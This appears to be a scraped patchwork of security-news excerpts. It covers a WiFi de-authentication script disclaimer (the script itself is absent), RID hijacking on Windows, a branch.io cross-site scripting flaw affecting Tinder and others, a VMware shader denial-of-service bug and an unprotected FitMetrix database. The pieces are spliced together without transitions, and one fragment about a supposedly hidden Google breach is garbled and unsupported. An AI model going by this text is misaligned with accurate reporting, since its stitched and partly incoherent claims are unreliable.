It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that’s simple to execute and hard to stop –all the features that hackers and malware authors are looking for from an exploitation technique.
What’s more surprising, is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has not received either media coverage nor has it been seen employed in malware campaigns.
Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).
The RID is a code added at the end of account security identifiers (SIDs) that describes that user’s permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.
Image: Sebastian Castro
Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.
The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.
But in cases where a hacker has a foothold on a system –via either malware or by brute-forcing an account with a weak password– the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.
Since registry keys are also boot persistent, any modifications made to an account’s RID remain permanent, or until fixed.
The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.
“It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim,” Castro told ZDNet in an interview last week.
“On the other hand, I think is easy to spot when doing forensics operations, but you need to know where to look at.
“It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager],” Castro added.
Bug-hunters have told how they uncovered a significant security flaw that affected the likes of Tinder, Yelp, Shopify, and Western Union – and potentially hundreds of millions of folks using these sites and apps.
The software sniffers said they first came across the exploitable programming blunder while digging into webpage code on dating websites. After discovering a Tinder.com subdomain – specifically, go.tinder.com – that had a cross-site scripting flaw, they got in touch with the hookup app’s makers to file a bug report.
As it turned out, the vulnerability they discovered went far beyond one subdomain on a site for lonely hearts. The team at VPNMentor said the since-patched security hole had left as many as 685 million netizens vulnerable to cross-site-scripting attacks, during which hackers attempt to steal data and hijack accounts. To pull off one of these scripting attacks, a victim would have to click on a malicious link or open a booby-trapped webpage while logged into a vulnerable service.
That staggering nine-figure number is because the security issue was actually within a toolkit, called branch.io, that tracks website and app users to figure out where they’ve come from, be it Facebook, email links, Twitter, etc. With the bug lurking in branch.io’s code and embedded in a ton of services and mobile applications, the number of people potentially at risk of being hacked via cross-site scripting soared past the half-a-billion mark, we’re told.
It’s only three senators and chances are you haven’t heard of the massive, millions affected data breach suffered by Google, that they didn’t report. Interestingly, if you try to Google the breach you get loads of hits on Google’s bug reporting program, but almost nothing on the breach. Google has done an astoundly good job of keeping this under their hats.
The vuln (CVE-2018-6977) allows an attacker with normal local user privileges to trigger an infinite loop in a 3D-rendering shader. According to VMware, a “specially crafted 3D shader may loop for an infinite amount of time and lock up a VM’s virtual graphics device”.
If that happens, VMware warned, the hypervisor may rely on the host box’s graphics driver to ensure other users of the physical machine are not impacted by the infinite graphical loop.
“However, many graphics drivers may themselves get into to a denial-of-service condition caused by such infinite shaders, and as a result other VMs or processes running on the host might also be affected,” said VMware in a statement.
FitMetrix, a fitness technology and performance tracking company owned by gym booking giant Mindbody, has exposed millions of user records because it left several of its servers without a password.
The company builds fitness tracking software for gyms and group classes — like CrossFit and SoulCycle — that displays heart rate and other fitness metric information for interactive workouts. FitMetrix was acquired by gym and wellness scheduling service Mindbody earlier this year for $15.3 million, according to a government filing.
Last week, a security researcher found three FitMetrix unprotected servers leaking customer data.
It isn’t known how long the servers had been exposed, but the servers were indexed by Shodan, a search engine for open ports and databases, in September.
The servers included two of the same ElasticSearch instances and a storage server — all hosted on Amazon Web Service — yet none were protected by a password, allowing anyone who knew where to look to access the data on millions of users.
Bob Diachenko, Hacken.io’s director of cyber risk research, found the databases containing 113.5 million records — though it’s not known how many users were directly affected. Each record contained a user’s name, gender, email address, phone numbers, profile photos, their primary workout location, emergency contacts and more. Many of the records were not fully complete.
